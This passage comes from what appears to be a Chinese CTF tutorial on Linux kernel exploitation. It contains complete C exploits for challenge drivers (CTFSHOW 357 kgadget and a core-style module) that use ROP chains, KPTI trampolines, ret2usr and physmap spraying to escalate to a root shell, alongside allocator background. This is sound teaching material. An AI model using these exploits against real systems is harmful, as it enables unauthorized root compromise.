rsp;\"\n \"pushf;\"\n \"pop user_rflags;\"\n );\n log_success(\"[*] Status has been saved.\");\n}\n\n\/\/ \u63d0\u6743\u540e\u7684 Shell\nvoid get_root_shell(void){\n if(getuid()) {\n log_error(\"[x] Failed to get the root!\");\n sleep(5);\n exit(EXIT_FAILURE);\n }\n log_success(\"[+] Successful to get the root.\");\n log_info(\"[*] Execve root shell now...\");\n system(\"\/bin\/sh\");\n exit(EXIT_SUCCESS);\n}\n\n\/**\n * Challenge Interface\n *\/\nvoid core_read(int fd, char *buf){\n ioctl(fd, 0x6677889B, buf);\n}\n\nvoid set_off_val(int fd, size_t off){\n ioctl(fd, 0x6677889C, off);\n}\n\nvoid core_copy(int fd, size_t nbytes){\n ioctl(fd, 0x6677889A, nbytes);\n}\n\n\/**\n * Exploitation Gadgets (Static Offsets)\n *\/\n\/\/ pop rdi; ret\n#define OFF_POP_RDI 0xb2f\n\/\/ mov rdi, rax; pop rbp; mov rax, rdi; pop r12; ret (\u7a33\u5b9a\u7248)\n#define OFF_MOV_RDI_RAX 0x3f9ede \n\nvoid exploitation(void){\n FILE *ksyms_file;\n int fd;\n char buf[0x1000], type[0x10];\n size_t addr;\n size_t canary;\n size_t rop_chain[0x100];\n size_t i;\n \n \/\/ \u8fd0\u884c\u65f6\u8ba1\u7b97\u7684 Gadget \u5730\u5740\n size_t g_pop_rdi, g_mov_rdi_rax, g_kpti_trampoline;\n\n log_info(\"[*] Start to exploit...\");\n save_status();\n\n \/\/ 1. \u6253\u5f00\u8bbe\u5907\n \/\/ \u4f18\u5148\u5c1d\u8bd5 \/proc\/show\uff0c\u5931\u8d25\u5219\u5c1d\u8bd5 \/proc\/core\n fd = open(\"\/proc\/show\", O_RDWR);\n if(fd < 0) fd = open(\"\/proc\/show\", O_RDWR);\n if(fd < 0) {\n log_error(\"[x] Failed to open the device!\");\n exit(EXIT_FAILURE);\n }\n\n \/\/ 2. \u83b7\u53d6\u5185\u6838\u7b26\u53f7\n log_info(\"[*] Reading \/tmp\/kallsyms...\");\n ksyms_file = fopen(\"\/tmp\/kallsyms\", \"r\");\n if(ksyms_file == NULL) {\n log_error(\"[x] Failed to open the sym_table file!\");\n exit(EXIT_FAILURE);\n }\n\n while(fscanf(ksyms_file, \"%lx%s%s\", &addr, type, buf) != EOF) {\n if(!commit_creds && !strcmp(buf, \"commit_creds\")) {\n commit_creds = addr;\n printf(SUCCESS_MSG(\"[+] commit_creds: \") \"%lx\\n\", commit_creds);\n }\n else if(!prepare_kernel_cred && !strcmp(buf, \"prepare_kernel_cred\")) {\n prepare_kernel_cred = addr;\n printf(SUCCESS_MSG(\"[+] prepare_kernel_cred: \") \"%lx\\n\", prepare_kernel_cred);\n }\n else if(!startup_64 && !strcmp(buf, \"startup_64\")) {\n startup_64 = addr;\n printf(SUCCESS_MSG(\"[+] startup_64: \") \"%lx\\n\", startup_64);\n }\n else if(!swapgs_restore_regs && !strcmp(buf, \"swapgs_restore_regs_and_return_to_usermode\")) {\n swapgs_restore_regs = addr;\n printf(SUCCESS_MSG(\"[+] swapgs_restore_regs: \") \"%lx\\n\", swapgs_restore_regs);\n }\n }\n fclose(ksyms_file);\n\n \/\/ 3. \u8ba1\u7b97\u57fa\u5740\u548c Gadget\n if (startup_64) {\n kernel_base = startup_64;\n printf(SUCCESS_MSG(\"[+] Kernel Base found (KASLR): \") \"%lx\\n\", kernel_base);\n } else {\n printf(INFO_MSG(\"[!] No KASLR detected, using static base: \") \"%lx\\n\", kernel_base);\n }\n\n g_pop_rdi = kernel_base + OFF_POP_RDI;\n g_mov_rdi_rax = kernel_base + OFF_MOV_RDI_RAX;\n \n \/\/ \u3010\u5173\u952e\u6539\u8fdb\u3011KPTI Trampoline \u7cbe\u786e\u5165\u53e3\n \/\/ 0x910 (mov rdi, cr3) - 0x8DA (func start) = 0x36\n \/\/ \u8df3\u8fc7\u524d\u9762\u7684 pop\uff0c\u76f4\u63a5\u5207\u6362 CR3\uff0c\u6808\u5e03\u5c40\u66f4\u5e72\u51c0\n g_kpti_trampoline = swapgs_restore_regs + 22;\n\n \/\/ 4. \u6cc4\u9732 Canary\n log_info(\"[*] Reading value of kernel stack canary...\");\n set_off_val(fd, 64);\n core_read(fd, buf);\n canary = ((size_t*) buf)[0];\n printf(SUCCESS_MSG(\"[+] Got kernel stack canary: \") \"%lx\\n\", canary);\n\n \/\/ 5. \u6784\u9020 ROP Chain\n \/\/ \u521d\u59cb\u5316\u7f13\u51b2\u533a\n memset(rop_chain, 0, sizeof(rop_chain));\n i = 0;\n\n \/\/ [0-7] Padding\n for(; i < 8; i++) rop_chain[i] = canary;\n\n \/\/ [8] Canary\n rop_chain[i++] = canary;\n\n \/\/ [9] Saved RBP\n rop_chain[i++] = 0xdeadbeef;\n\n \/\/ [10] ROP Start\n \/\/ prepare_kernel_cred(0)\n rop_chain[i++] = g_pop_rdi;\n rop_chain[i++] = 0;\n rop_chain[i++] = prepare_kernel_cred;\n\n \/\/ commit_creds(rax)\n \/\/ Gadget: mov rdi, rax ; pop rbp ; mov rax, rdi ; pop r12 ; ret\n rop_chain[i++] = g_mov_rdi_rax;\n rop_chain[i++] = 0; \/\/ padding for pop rbp\n rop_chain[i++] = 0; \/\/ padding for pop r12\n rop_chain[i++] = commit_creds;\n\n \/\/ KPTI Bypass & Return\n \/\/ \u76f4\u63a5\u8df3\u5230 mov rdi, cr3\uff0c\u4e0d\u9700\u8981\u586b\u5145 pop \u5783\u573e\u6570\u636e\n rop_chain[i++] = g_kpti_trampoline;\n rop_chain[i++] = *(size_t*) \"0\"; \/\/ Padding 1\n rop_chain[i++] = *(size_t*) \"0\"; \/\/ Padding 2\n\n \/\/ IRETQ Frame (\u76f4\u63a5\u63a5\u5728 trampoline \u540e\u9762)\n rop_chain[i++] = (size_t) get_root_shell; \/\/ RIP\n rop_chain[i++] = user_cs;\n rop_chain[i++] = user_rflags;\n rop_chain[i++] = user_sp;\n rop_chain[i++] = user_ss;\n\n \/\/ 6. \u89e6\u53d1\u6ea2\u51fa\n log_info(\"[*] Start to execute ROP chain in kernel space...\");\n write(fd, rop_chain, i * 8); \/\/ \u6ce8\u610f\u8fd9\u91cc\u7684\u957f\u5ea6\n \/\/ \u89e6\u53d1\u6574\u6570\u6ea2\u51fa\n core_copy(fd, 0xffffffffffff0100);\n}\n\nint main(int argc, char ** argv){\n exploitation();\n return 0;\n}<\/code><\/pre>\n\n\n\n<\/span>\u5f00\u542fSMEP\u3001SMAP<\/span><\/h5>\n\n\n\n\u8fd9\u79cd\u60c5\u51b5\u4e0b\u5bf9ROP\u65e0\u5f71\u54cd\uff0c\u5bf9ret2usr\u6709\u5f71\u54cd\u3002\u5982\u679cKPTI\u5173\u95ed\u4e14SMEP\u3001SMAP\u5f00\u542f\u7684\u60c5\u51b5\u4e0b\uff0c\u53ef\u4ee5\u901a\u8fc7\u4f7f\u7528 ROP \u6765\u5173\u95ed SMEP&SMAP\uff08\u5c31\u662f\u7ed9CR4\u5bc4\u5b58\u5668\u7684\u5bf9\u5e94\u6807\u5fd7\u4f4d\u6e05\u96f6\uff0c\u901a\u5e38\u8d4b\u503c0x6f0\uff09\uff0c\u5177\u4f53exp\u53ef\u4ee5\u53c2\u8003\uff1a<\/p>\n\n\n\n
https:\/\/ctf-wiki.org\/pwn\/linux\/kernel-mode\/exploitation\/rop\/bypass-smep\/<\/p>\n\n\n\n
<\/p>\n\n\n\n
<\/span>\u6267\u884c\u53ef\u63a7\u6307\u9488<\/span><\/h2>\n\n\n\n<\/span>CTFSHOW 357 (MINI-LCTF2022 – kgadget)<\/span><\/h3>\n\n\n\n\u8fd9\u9898\u6bd4\u8f83\u7b80\u5355\u7c97\u66b4\uff0c\u76f4\u63a5\u7ed9\u4e86\u4e2a\u6267\u884c\u53ef\u63a7\u6307\u9488\u7684\u539f\u8bed\uff1a<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\n
<\/span>\u60c5\u5f621 \u65e0\u4fdd\u62a4<\/span><\/h4>\n\n\n\n\u5148\u5047\u8bbe\u4fdd\u62a4\u4ec0\u4e48\u90fd\u6ca1\u5f00\u7684\u60c5\u51b5\u4e0b\uff0c\u90a3\u663e\u7136\u662f\u53ef\u4ee5\u76f4\u63a5\u6253ret2usr\uff0c\u76f4\u63a5\u5728\u7528\u6237\u6001\u5e03\u7f6ecommit_cred\uff0c\u8df3\u56de\u53bb\u6267\u884c\u5c31\u884c\uff1a<\/p>\n\n\n\n
run.sh:<\/p>\n\n\n\n
qemu-system-x86_64 \\\n -m 256M \\\n -cpu kvm64 \\\n -smp cores=2,threads=2 \\\n -kernel bzImage \\\n -initrd .\/rootfs.cpio \\\n -nographic \\\n -monitor \/dev\/null \\\n -snapshot \\\n -append \"console=ttyS0 nokaslr pti=off quiet oops=panic panic=1\" \\\n -no-reboot \\\n -s<\/code><\/pre>\n\n\n\nexp:<\/p>\n\n\n\n
#include <stdio.h>\n#include <stdlib.h>\n#include <fcntl.h>\n#include <unistd.h>\n#include <sys\/ioctl.h>\n#include <stdint.h>\n\n\/\/ \u4f60\u521a\u521a\u67e5\u5230\u7684\u5185\u6838\u51fd\u6570\u5730\u5740\n#define PREPARE_KERNEL_CRED 0xffffffff810c9540LL\n#define COMMIT_CREDS 0xffffffff810c92e0LL\n\ntypedef void* (*prepare_kernel_cred_t)(void*);\ntypedef int (*commit_creds_t)(void*);\n\nprepare_kernel_cred_t prepare_kernel_cred = (prepare_kernel_cred_t)PREPARE_KERNEL_CRED;\ncommit_creds_t commit_creds = (commit_creds_t)COMMIT_CREDS;\n\n\/\/ \u63d0\u6743 Payload\nvoid get_root() {\n commit_creds(prepare_kernel_cred(0));\n}\n\nint main() {\n \/\/ 1. \u6253\u5f00\u9a71\u52a8\u8bbe\u5907\n int fd = open(\"\/dev\/ctfshow\", O_RDWR);\n if (fd < 0) {\n perror(\"[-] \u65e0\u6cd5\u6253\u5f00\u8bbe\u5907 \/dev\/ctfshow\");\n return -1;\n }\n\n \/\/ 2. \u6784\u9020\u6307\u5411 Payload \u5730\u5740\u7684\u6307\u9488\n \/\/ \u786e\u4fdd\u8fd9\u91cc\u5199\u7684\u662f uint64_t \n uint64_t payload_addr = (uint64_t)get_root;\n uint64_t *v3_fake_ptr = &payload_addr;\n\n printf(\"[*] Payload (get_root) \u4f4d\u4e8e\u7528\u6237\u6001\u5730\u5740: %p\\n\", (void*)payload_addr);\n\n \/\/ 3. \u89e6\u53d1\u6f0f\u6d1e (cmd = 114514)\n \/\/ v3_fake_ptr \u5b58\u5165 RDX -> \u5185\u6838 v3 \u5f97\u5230\u8be5\u6307\u9488 -> v4 = *v3 \u5373 get_root\n printf(\"[*] \u6b63\u5728\u89e6\u53d1 ioctl \u6f0f\u6d1e...\\n\");\n ioctl(fd, 114514, v3_fake_ptr);\n\n \/\/ 4. \u9a8c\u8bc1\u662f\u5426\u6210\u529f\n if (getuid() == 0) {\n printf(\"[+] \u63d0\u6743\u6210\u529f! \u5f53\u524d UID: %d\\n\", getuid());\n system(\"\/bin\/sh\");\n } else {\n printf(\"[-] \u63d0\u6743\u5931\u8d25\uff0cUID \u4ecd\u4e3a: %d\\n\", getuid());\n }\n\n close(fd);\n return 0;\n}<\/code><\/pre>\n\n\n\n<\/div><\/figure>\n\n\n\n
<\/span>\u60c5\u5f622 \u5f00\u542fKPTI\u3001SMEP\u3001SMAP<\/span><\/h4>\n\n\n\n<\/span>ret2usr<\/span><\/h5>\n\n\n\nrun.sh:<\/p>\n\n\n\n
#!\/bin\/sh\nqemu-system-x86_64 \\\n -m 256M \\\n -cpu kvm64,+smap,+smep \\\n -smp cores=2,threads=2 \\\n -kernel bzImage \\\n -initrd .\/rootfs.cpio \\\n -nographic \\\n -monitor \/dev\/null \\\n -snapshot \\\n -append \"console=ttyS0 nokaslr pti=off quiet oops=panic panic=10\" \\\n -no-reboot \\\n -s\n<\/code><\/pre>\n\n\n\nret2usr\u5931\u6548\uff1a<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\n
\u8fd9\u65f6\u5019\u5c31\u8981\u5f15\u5165\u4e00\u79cd\u65b0\u7684\u65b9\u6cd5\u4e86\u3002<\/p>\n\n\n\n
<\/span>ret2dir<\/span><\/h5>\n\n\n\n\u7b80\u5355\u6765\u8bf4\u5c31\u662f\uff0c\u5185\u6838\u6001\u4e0d\u80fd\u8bbf\u95ee\u548c\u6267\u884c\u7528\u6237\u6001\u4ee3\u7801\u770b\u4e0a\u53bb\u5bf9\u8fd9\u79cd\u53ea\u80fd\u63a7\u5236\u7a0b\u5e8f\u6267\u884c\u6d41\u7684\u539f\u8bed\u6765\u8bf4\u51e0\u4e4e\u65e0\u89e3\uff0c\u90a3\u6709\u6ca1\u6709\u4ec0\u4e48\u5730\u65b9\u662f\u6f0f\u7f51\u4e4b\u9c7c\uff1f\u6709\u7684\uff0c\u5728\u5185\u6838\u5730\u5740\u7a7a\u95f4\u91cc\u9762\u6709\u4e00\u6bb5\u79f0\u4e3aphysmap\u7684\u533a\u57df\uff0c\u8be5\u533a\u57df\u4e2d\u6620\u5c04\u4e86RAM\uff0c\u800cRAM\u4e2d\u4f1a\u6620\u5c04\u90e8\u5206\u7528\u6237\u6001\u7684\u5730\u5740\u7a7a\u95f4\u3002\u5982\u679c\u7528\u6237\u6001\u5e03\u7f6e\u7684payload\u80fd\u5728physmap\u533a\u57df\u627e\u5230\uff0c\u90a3\u5c31\u53ef\u4ee5\u8df3\u8fc7\u53bb\u6267\u884c\u4e86\u3002\u95ee\u9898\u53c8\u6765\u4e86\uff1a\u5e94\u8be5\u5982\u4f55\u627e\u5230\u8fd9\u6bb5payload\u6240\u5728\u4f4d\u7f6e\uff1f\u53ef\u4ee5\u5728\u7528\u6237\u6001\u7a7a\u95f4\u4f7f\u7528\u7c7b\u4f3c\u5806\u55b7\u7684\u6280\u672f\u5e7f\u6492\u7f51\uff0c\u4e4b\u540e\u518d\u968f\u673a\u6311\u9009\u4e00\u4e2a\u76f8\u5bf9\u9760\u8fd1\u9ad8\u5730\u5740\u7684 direct mapping area \u4e0a\u7684\u5730\u5740\u8fdb\u884c\u5229\u7528\uff0c\u8fd9\u6837\u6211\u4eec\u5c31\u6709\u5f88\u5927\u7684\u6982\u7387\u547d\u4e2d\u5230\u6211\u4eec\u5e03\u7f6e\u7684 payload \u4e0a\u3002<\/p>\n\n\n\n
\u7531\u4e8e\u5f00\u542fKPTI\uff0c\u6240\u4ee5payload\u80af\u5b9a\u4e5f\u5f97\u662fROP\u94fe\uff0c\u4e8e\u662f\u53c8\u51fa\u73b0\u4e00\u4e2a\u95ee\u9898\uff0c\u8fd9\u4e2a\u6d1e\u63a7\u5236\u7684\u662fRIP\u6307\u9488\uff0cRIP\u6307\u9488\u8df3\u5230payload\u4e86\uff0cRSP\u5e76\u6ca1\u6709\uff0c\u53ef\u4ee5\u7528\u4e00\u4e9b\u7279\u6b8agadget\u6765\u89e3\u51b3\u8fd9\u4e2a\u95ee\u9898\uff0c\u8fd9\u91cc\u5c31\u76f4\u63a5\u7ed9\u51fa\u4e00\u79cd\u901a\u7528ROP\u7684\u65b9\u6cd5\uff0c\u5373pt_regs\u5229\u7528\u3002<\/p>\n\n\n\n
\u53ef\u4ee5\u53c2\u8003\uff1a<\/p>\n\n\n\n
https:\/\/ctf-wiki.org\/pwn\/linux\/kernel-mode\/exploitation\/rop\/ret2ptregs\/#uaf-seq_operations-pt_regs-rop<\/p>\n\n\n\n
https:\/\/ctf-wiki.org\/pwn\/linux\/kernel-mode\/exploitation\/rop\/ret2dir\/<\/p>\n\n\n\n
\u7b80\u5355\u6765\u8bf4\uff0c\u5c31\u662f\u8fdb\u884c\u7cfb\u7edf\u8c03\u7528syscall\u65f6\u5019\uff0c\u4f17\u591a\u5bc4\u5b58\u5668\u90fd\u4f1a\u88ab\u538b\u5165\u5185\u6838\u6808\u4e0a\uff0c\u5f62\u6210pt_regs \u7ed3\u6784\u4f53\uff0c\u63d0\u524d\u5728\u5bc4\u5b58\u5668\u91cc\u9762\u8d4b\u503c\uff0c\u518d\u901a\u8fc7syscall\u5c31\u53ef\u4ee5\u5b9e\u73b0\u6784\u9020\u6808\u7684\u6548\u679c\uff0c\u6700\u540e\u628arip\u6307\u5411\u8bf8\u5982add rsp, n ; ret \u8fd9\u79cd\u6307\u4ee4\u5c31\u80fd\u6fc0\u6d3b\u6784\u9020\u7684\u6808\u5b9e\u73b0ROP\u3002<\/p>\n\n\n\n
\u7531\u4e8e\u672c\u9898\u4e2d\u628a\u5bc4\u5b58\u5668\u5927\u90e8\u5206\u90fd\u6e05\u7a7a\uff0c\u53ea\u7559\u4e0br8\u3001r9\u53ef\u4ee5\u7528\uff0c\u6240\u4ee5\u8fd8\u5f97\u518d\u95f4\u63a5\u4e00\u6b21\uff0c\u901a\u8fc7pop rsp; ret\u628apayload\u5730\u5740\u4f20\u7ed9rsp\u6765\u5b9e\u73b0\u6808\u8fc1\u79fb\u3002\u5177\u4f53\u8fc7\u7a0b\u5982\u4e0b\uff1a<\/p>\n\n\n\n
1. \u901a\u8fc7physmap spray\u6765mmap\u6279\u91cf\u4e0b\u8ff0payload\uff1a<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\n
2. \u6267\u884c\u4e0b\u8ff0\u4ee3\u7801\uff0csyscall\u628apt_regs\u538b\u5165\u6808\uff0c\u540c\u65f6rip\u6307\u5411\u5230try_hit\uff0c\u547d\u4e2dpayload\uff1a<\/p>\n\n\n\n
__asm__(\n \"mov r15, 0xbeefdead;\"\n \"mov r14, 0x11111111;\"\n \"mov r13, 0x22222222;\"\n \"mov r12, 0x33333333;\"\n \"mov rbp, 0x44444444;\"\n \"mov rbx, 0x55555555;\"\n \"mov r11, 0x66666666;\"\n \"mov r10, 0x77777777;\"\n \"mov r9, pop_rsp_ret;\" \/\/ stack migration again\n \"mov r8, try_hit;\"\n \"mov rax, 0x10;\"\n \"mov rcx, 0xaaaaaaaa;\"\n \"mov rdx, try_hit;\"\n \"mov rsi, 0x1bf52;\"\n \"mov rdi, dev_fd;\"\n \"syscall\"\n );<\/code><\/pre>\n\n\n\nrsp\u548crip\u5982\u4e0b\uff1a<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\n
3. rip\u6267\u884cadd rsp, 0xN\u540ersp\u6307\u5411r9\uff1apop_rsp_ret\uff1a<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\n
4.rip\u6267\u884cret\uff0crsp\u628apop_rsp_ret\u6307\u4ee4\u5730\u5740pop\u7ed9rip\uff1a<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\n
5. rip\u6267\u884cpop_rsp_ret\u7684pop rsp\uff0crsp\u88ab\u52ab\u6301\u5230try_hit\uff0c\u5b9e\u73b0\u6808\u8fc1\u79fb\uff1a<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\n
6. rip\u6267\u884cpop_rsp_ret\u5269\u4e0b\u7684ret\uff0c\u518d\u6b21\u6536\u5230rsp pop\u6765\u7684add rsp, 0xN ; ret\uff0c\u6b63\u5f0f\u542f\u52a8ROP\uff1a<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\n
exp\u6539\u81eahttps:\/\/ctf-wiki.org\/pwn\/linux\/kernel-mode\/exploitation\/rop\/ret2dir<\/p>\n\n\n\n
#define _GNU_SOURCE\n#include <unistd.h>\n#include <fcntl.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <sys\/mman.h>\n\nsize_t prepare_kernel_cred = 0xffffffff810c9540;\nsize_t commit_creds = 0xffffffff810c92e0;\nsize_t init_cred = 0xffffffff82a6b700;\nsize_t pop_rdi_ret = 0xffffffff8108c6f0;\nsize_t pop_rax_ret = 0xffffffff810115d4;\nsize_t pop_rsp_ret = 0xffffffff811483d0;\nsize_t swapgs_restore_regs_and_return_to_usermode = 0xffffffff81c00fb0 + 27;\nsize_t add_rsp_0xe8_pop_rbx_pop_rbp_ret = 0xffffffff812bd353;\nsize_t add_rsp_0xd8_pop_rbx_pop_rbp_ret = 0xffffffff810e7a54;\nsize_t add_rsp_0xa0_pop_rbx_pop_r12_pop_r13_pop_rbp_ret = 0xffffffff810737fe;\nsize_t ret = 0xffffffff8108c6f1;\n\nvoid (*kgadget_ptr)(void);\nsize_t *physmap_spray_arr[16000];\nsize_t page_size;\nsize_t try_hit;\nint dev_fd;\n\nsize_t user_cs, user_ss, user_rflags, user_sp;\n\nvoid saveStatus(void)\n{\n __asm__(\"mov user_cs, cs;\"\n \"mov user_ss, ss;\"\n \"mov user_sp, rsp;\"\n \"pushf;\"\n \"pop user_rflags;\"\n );\n printf(\"\\033[34m\\033[1m[*] Status has been saved.\\033[0m\\n\");\n}\n\nvoid errExit(char * msg)\n{\n printf(\"\\033[31m\\033[1m[x] Error : \\033[0m%s\\n\", msg);\n exit(EXIT_FAILURE);\n}\n\nvoid getRootShell(void)\n{ \n puts(\"\\033[32m\\033[1m[+] Backing from the kernelspace.\\033[0m\");\n\n if(getuid())\n {\n puts(\"\\033[31m\\033[1m[x] Failed to get the root!\\033[0m\");\n exit(-1);\n }\n\n puts(\"\\033[32m\\033[1m[+] Successful to get the root. Execve root shell now...\\033[0m\");\n system(\"\/bin\/sh\");\n exit(0);\/\/ to exit the process normally instead of segmentation fault\n}\n\nvoid constructROPChain(size_t *rop)\n{\n int idx = 0;\n\n \/\/ gadget to trigger pt_regs and for slide\n for (; idx < (page_size \/ 8 - 0x30); idx++)\n rop[idx] = add_rsp_0xa0_pop_rbx_pop_r12_pop_r13_pop_rbp_ret;\n\n \/\/ more normal slide code\n for (; idx < (page_size \/ 8 - 0x10); idx++)\n rop[idx] = ret;\n\n \/\/ rop chain\n rop[idx++] = pop_rdi_ret;\n rop[idx++] = init_cred;\n rop[idx++] = commit_creds;\n rop[idx++] = swapgs_restore_regs_and_return_to_usermode;\n rop[idx++] = *(size_t*) \"0\";\n rop[idx++] = *(size_t*) \"0\";\n rop[idx++] = (size_t) getRootShell;\n rop[idx++] = user_cs;\n rop[idx++] = user_rflags;\n rop[idx++] = user_sp;\n rop[idx++] = user_ss;\n}\n\nint main(int argc, char **argv, char **envp)\n{\n saveStatus();\n\n dev_fd = open(\"\/dev\/ctfshow\", O_RDWR);\n if (dev_fd < 0)\n errExit(\"dev fd!\");\n\n page_size = sysconf(_SC_PAGESIZE);\n\n \/\/ construct per-page rop chain\n physmap_spray_arr[0] = mmap(NULL, page_size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);\n constructROPChain(physmap_spray_arr[0]);\n\n \/\/ spray physmap, so that we can easily hit one of them\n puts(\"[*] Spraying physmap...\");\n for (int i = 1; i < 15000; i++)\n {\n physmap_spray_arr[i] = mmap(NULL, page_size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);\n if (!physmap_spray_arr[i])\n errExit(\"oom for physmap spray!\");\n memcpy(physmap_spray_arr[i], physmap_spray_arr[0], page_size);\n }\n\n puts(\"[*] trigger physmap one_gadget...\");\n \/\/sleep(5);\n\n try_hit = 0xffff888000000000 + 0x7000000;\n __asm__(\n \"mov r15, 0xbeefdead;\"\n \"mov r14, 0x11111111;\"\n \"mov r13, 0x22222222;\"\n \"mov r12, 0x33333333;\"\n \"mov rbp, 0x44444444;\"\n \"mov rbx, 0x55555555;\"\n \"mov r11, 0x66666666;\"\n \"mov r10, 0x77777777;\"\n \"mov r9, pop_rsp_ret;\" \n \"mov r8, try_hit;\"\n \"mov rax, 0x10;\"\n \"mov rcx, 0xaaaaaaaa;\"\n \"mov rdx, try_hit;\"\n \"mov rsi, 0x1bf52;\"\n \"mov rdi, dev_fd;\"\n \"syscall\"\n );\n}<\/code><\/pre>\n\n\n\n<\/div><\/figure>\n\n\n\n
\u5982\u679c\u4e0d\u662f\u56e0\u4e3a\u5bc4\u5b58\u5668\u53ea\u5269\u4e24\u4e2a\u53ef\u7528\uff0c\u6211\u611f\u89c9\u8c8c\u4f3c\u90fd\u4e0d\u9700\u8981\u914d\u5408physmap spray\uff0c\u53ea\u6253pt_regs\u5c31\u884c\u4e86\u3002<\/p>\n\n\n\n
<\/span>UAF<\/span><\/h2>\n\n\n\n\u8fdb\u5165\u5806\u4e4b\u524d\uff0c\u6709\u5fc5\u8981\u4e86\u89e3\u4e00\u4e0blinux\u5185\u6838\u7684\u5206\u914d\u673a\u5236\uff0c\u4e5f\u5c31\u662fbuddy\u4f19\u4f34\u5206\u914d\u5668\u548cslab\/slub\/slob\u5206\u914d\u5668\uff0c\u5206\u914d\u673a\u5236\u76f8\u8f83\u4e8e\u7528\u6237\u6001\u7684ptmalloc\u8981\u7b80\u5355\u4e00\u4e9b\u3002<\/p>\n\n\n\n
Linux \u5185\u6838\u4e2d buddy \u4f19\u4f34\u5206\u914d\u5668\u662f\u5e95\u5c42\u6838\u5fc3\u7684\u5927\u5757\u5185\u5b58\u5206\u914d\u5668\uff0c\u4ee5\u7269\u7406\u9875\u6846<\/strong>\u4e3a\u6700\u5c0f\u5206\u914d\u5355\u4f4d\uff08\u5e38\u89c4\u7cfb\u7edf\u4e2d\u4e3a 4K\uff09\uff0c\u8bbe\u8ba1\u6709 11 \u4e2a order\uff08\u5bf9\u5e94 order 0~10\uff09\uff0c\u6bcf\u4e2a order \u4ee3\u8868 2 \u7684 order \u6b21\u65b9\u4e2a\u8fde\u7eed\u7269\u7406\u9875\u6846\uff0c\u56e0\u6b64\u53ef\u5206\u914d\u7684\u5185\u5b58\u5757\u5927\u5c0f\u4ece 4K\uff08order 0\uff09\u4f9d\u6b21\u9012\u589e\u81f3 4MB\uff08order 10\uff09\u3002\u5206\u914d\u8fc7\u7a0b\uff1a\u5206\u914d\u5185\u5b58\u65f6\u4f18\u5148\u67e5\u627e\u5339\u914d order \u7684\u7a7a\u95f2\u8fde\u7eed\u9875\u6846\uff0c\u65e0\u5339\u914d\u5219\u62c6\u5206\u66f4\u9ad8 order \u7684\u7a7a\u95f2\u5757\uff1b\u91ca\u653e\u5185\u5b58\u65f6\u4f1a\u68c0\u67e5\u5730\u5740\u8fde\u7eed\u3001\u5927\u5c0f\u76f8\u540c\u7684 \u201c\u4f19\u4f34\u5757\u201d\uff0c\u82e5\u5747\u4e3a\u7a7a\u95f2\u5219\u5408\u5e76\u4e3a\u66f4\u5927\u7684\u5757\uff0c\u4ee5\u6b64\u6709\u6548\u89e3\u51b3\u5185\u6838\u7269\u7406\u5185\u5b58\u7684\u5916\u90e8\u788e\u7247<\/strong>\u95ee\u9898\uff0c\u4e3a\u4e0a\u5c42\u5185\u5b58\u5206\u914d\u5668\u63d0\u4f9b\u8fde\u7eed\u7684\u9875\u6846\u8d44\u6e90\u652f\u6491\u3002<\/p>\n\n\n\nslab \u5206\u914d\u5668\u662f\u57fa\u4e8e buddy \u5206\u914d\u5668\u5b9e\u73b0\u7684\u7ec6\u7c92\u5ea6\u5c0f\u5185\u5b58\u5206\u914d\u5668\uff0c\u4e13\u4e3a\u5185\u6838\u5c0f\u5185\u5b58\u5bf9\u8c61\uff08\u5982\u5404\u7c7b\u7ed3\u6784\u4f53\u3001\u6587\u4ef6\u63cf\u8ff0\u7b26\u3001\u5957\u63a5\u5b57\u7b49\uff09\u5206\u914d\u8bbe\u8ba1\uff0c\u6838\u5fc3\u89e3\u51b3 buddy \u5206\u914d\u7c92\u5ea6\u8fc7\u7c97\u5bfc\u81f4\u7684\u5185\u90e8\u788e\u7247<\/strong>\u95ee\u9898\uff0c\u540c\u65f6\u5927\u5e45\u63d0\u5347\u5c0f\u5bf9\u8c61\u7684\u5206\u914d\u4e0e\u91ca\u653e\u6548\u7387\u3002\u6bcf\u4e2a\u4ecebuddy\u5206\u914d\u5668\u83b7\u5f97\u7684\u5185\u5b58\u5757\u79f0\u4e3a\u4e00\u4e2aslab\uff0c\u6240\u4ee5\u4e00\u4e2aslab\u7684\u5927\u5c0f\u4e0d\u4e00\uff08 4K \u7684\u6574\u6570\u500d\uff09\uff0c\u5355\u4e2a slab \u5757\u4f1a\u88ab\u89c4\u6574\u5207\u5272\u4e3a\u591a\u4e2a\u76f8\u540c\u5927\u5c0f\u7684\u5185\u5b58\u5bf9\u8c61\uff08object\uff09\uff0c\u540c\u89c4\u683c object \u7684\u7ba1\u7406\u7531kmem_cache<\/strong>\u6838\u5fc3\u7ed3\u6784\u4f53\u7edf\u4e00\u8d1f\u8d23\u3002kmem_cache \u5305\u542b\u4e24\u4e2a\u5173\u952e\u5b50\u7ed3\u6784\uff1a\u4e00\u662fkmem_cache_cpu<\/strong>\uff0c\u4e3a\u6bcf\u4e2a CPU \u6838\u5fc3\u72ec\u6709\uff0c\u5185\u7f6e freelist \u6307\u9488\u6307\u5411\u672c\u5730\u53ef\u76f4\u63a5\u5206\u914d\u7684\u4e0b\u4e00\u4e2a\u7a7a\u95f2 object\uff0c\u5206\u914d\u65f6\u4f18\u5148\u4ece\u672c\u5730\u7f13\u5b58\u83b7\u53d6\u3001\u91ca\u653e\u65f6\u4f18\u5148\u653e\u56de\u672c\u5730\uff0c\u4ece\u6839\u672c\u4e0a\u51cf\u5c11 CPU \u95f4\u7684\u9501\u7ade\u4e89\uff1b\u4e8c\u662fkmem_cache_node<\/strong>\uff0c\u6309 NUMA \u8282\u70b9\u5212\u5206\uff08\u6bcf\u4e2a NUMA \u8282\u70b9\u4e00\u4e2a\uff09\uff0c\u5e76\u975e\u901a\u7528\u7f13\u5b58\uff0c\u5176\u7ef4\u62a4\u4e86\u8be5\u8282\u70b9\u4e0b full\uff08\u65e0\u7a7a\u95f2 